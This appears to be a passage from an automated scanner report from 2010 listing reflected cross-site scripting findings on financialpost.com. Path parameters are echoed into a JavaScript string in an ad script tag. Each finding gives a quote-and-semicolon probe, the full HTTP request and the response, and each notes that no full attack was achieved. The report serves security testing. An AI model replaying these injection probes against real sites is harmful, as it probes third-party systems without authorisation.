This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive86b9c'%3bbb1481860ca/Discover+your+true+competitive+advantage/3992781/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74233
Expires: Sun, 19 Dec 2010 03:12:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:36 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive86b9c';bb1481860ca/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive86b9c';bb1481860ca;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=32248287?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e36a'%3b760d8d1d1a9 was submitted in the REST URL parameter 3. This input was echoed as 7e36a';760d8d1d1a9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Discover+your+true+competitive+advantage/39927817e36a'%3b760d8d1d1a9/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70169
Expires: Sun, 19 Dec 2010 03:12:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:56 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/discover-your-true-competitive-advantage/39927817e36a';760d8d1d1a9/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=discover-your-true-competitive-advantage;kw=39927817e36a';760d8d1d1a9;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surrou ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c91c'%3bb0f449f0d2e was submitted in the REST URL parameter 4. This input was echoed as 1c91c';b0f449f0d2e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Discover+your+true+competitive+advantage/3992781/1c91c'%3bb0f449f0d2e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38647
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3dfa'%3bc1a1cb098d5 was submitted in the REST URL parameter 1. This input was echoed as b3dfa';c1a1cb098d5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executiveb3dfa'%3bc1a1cb098d5/Leadership+companies+honest+with+their+employees/3987151/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74644
Expires: Sun, 19 Dec 2010 03:12:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:34 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executiveb3dfa';c1a1cb098d5/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executiveb3dfa';c1a1cb098d5;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=83962964?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43db7'%3b7532e4f4caa was submitted in the REST URL parameter 3. This input was echoed as 43db7';7532e4f4caa in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Leadership+companies+honest+with+their+employees/398715143db7'%3b7532e4f4caa/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71329
Expires: Sun, 19 Dec 2010 03:12:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:51 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/leadership-companies-honest-with-their-employees/398715143db7';7532e4f4caa/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=leadership-companies-honest-with-their-employees;kw=398715143db7';7532e4f4caa;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTa ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69f5d'%3bbfa9b0eb109 was submitted in the REST URL parameter 4. This input was echoed as 69f5d';bfa9b0eb109 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Leadership+companies+honest+with+their+employees/3987151/69f5d'%3bbfa9b0eb109 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44711
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7cd1'%3b8a87ca5dda7 was submitted in the REST URL parameter 1. This input was echoed as a7cd1';8a87ca5dda7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executivea7cd1'%3b8a87ca5dda7/Leadership+make+good+decisions/3957410/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79991
Expires: Sun, 19 Dec 2010 03:12:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:28 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executivea7cd1';8a87ca5dda7/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executivea7cd1';8a87ca5dda7;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=33160721?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea152'%3b5875384a269 was submitted in the REST URL parameter 3. This input was echoed as ea152';5875384a269 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Leadership+make+good+decisions/3957410ea152'%3b5875384a269/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69799
Expires: Sun, 19 Dec 2010 03:12:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:37 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/leadership-make-good-decisions/3957410ea152';5875384a269/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=leadership-make-good-decisions;kw=3957410ea152';5875384a269;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bacb0'%3b92563dfa8ca was submitted in the REST URL parameter 4. This input was echoed as bacb0';92563dfa8ca in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Leadership+make+good+decisions/3957410/bacb0'%3b92563dfa8ca HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 45046
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae28c'%3bc70cc79a0a1 was submitted in the REST URL parameter 1. This input was echoed as ae28c';c70cc79a0a1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executiveae28c'%3bc70cc79a0a1/Organizations+fight+bureaucracy/3992875/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 88315
Expires: Sun, 19 Dec 2010 03:12:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:31 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executiveae28c';c70cc79a0a1/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executiveae28c';c70cc79a0a1;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=99274053?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c87f'%3bc33c1d433bd was submitted in the REST URL parameter 3. This input was echoed as 2c87f';c33c1d433bd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Organizations+fight+bureaucracy/39928752c87f'%3bc33c1d433bd/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63883
Expires: Sun, 19 Dec 2010 03:12:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:50 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/organizations-fight-bureaucracy/39928752c87f';c33c1d433bd/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=organizations-fight-bureaucracy;kw=39928752c87f';c33c1d433bd;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'or ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c799'%3bc87820a0f13 was submitted in the REST URL parameter 4. This input was echoed as 2c799';c87820a0f13 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Organizations+fight+bureaucracy/3992875/2c799'%3bc87820a0f13 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44205
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b293e'%3b061095bc4ca was submitted in the REST URL parameter 1. This input was echoed as b293e';061095bc4ca in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executiveb293e'%3b061095bc4ca/canadian-mba-programs/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43656
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8f55'%3bcca8fb45330 was submitted in the REST URL parameter 2. This input was echoed as e8f55';cca8fb45330 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/canadian-mba-programse8f55'%3bcca8fb45330/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44440
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98aba'%3bb9fb836393d was submitted in the REST URL parameter 1. This input was echoed as 98aba';b9fb836393d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive98aba'%3bb9fb836393d/ceo/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37452
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9721'%3b486d1a1eccd was submitted in the REST URL parameter 2. This input was echoed as e9721';486d1a1eccd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/ceoe9721'%3b486d1a1eccd/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
